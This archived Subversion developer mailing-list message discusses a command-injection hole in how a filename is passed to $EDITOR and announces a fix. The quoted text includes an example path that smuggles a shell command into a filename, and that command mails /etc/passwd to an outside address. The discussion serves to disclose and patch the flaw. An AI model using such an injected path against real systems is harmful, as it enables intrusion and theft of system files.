[svn.haxx.se] · SVN Dev · SVN Users · SVN Org · TSVN Dev · TSVN Users · Subclipse Dev · Subclipse Users · this month's index

[PATCH] Re: [PATCH] Quote filename passed to $EDITOR

From: Marcus Comstedt <marcus_at_mc.pp.se>
Date: 2002-07-23 23:33:43 CEST

Karl Fogel <kfogel@newton.ch.collab.net> writes:

> Ulrich Drepper <drepper@redhat.com> writes:
> > A svn repository can be set up by somebody with foul intentions.
> > Somebody else accesses it and the system() call gets executed on the
> > paths chosen by whoever created it. Then the patch could be something
> > like in this example:
> >
> > cat /dev/$(mail to-me@test.com < /etc/passwd; echo null)
> >
> > If the appropriate path component is never really shown anywhere this
> > might go completely unnoticed.
> Yeah, but the victim would have to fail to notice the strange path.
> Remember, the path is on the command line they're invoking -- so the
> relevant path component *is* shown before they run the commit command.
> I'm not saying it's not a hole, it's just a difficult one to exploit,
> as it requires gross inattention on the part of the user. That's why
> I'm not viewing it as a showstopper, is all.

And here's the patch to fix the hole/problem, using the cd method. As
a free bonus, it also fixes a spelling misteak and a small other bug.

(The other bug being that the cleanup code could use tmpfile_native in
 a situation where that variable wasn't even initialized. That's
 gotos for you... :)

Enjoy, and happy Alpha-day!

  // Marcus

To unsubscribe, e-mail: dev-unsubscribe@subversion.tigris.org
For additional commands, e-mail: dev-help@subversion.tigris.org

Received on Tue Jul 23 23:40:13 2002

This is an archived mail posted to the Subversion Dev mailing list.

This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.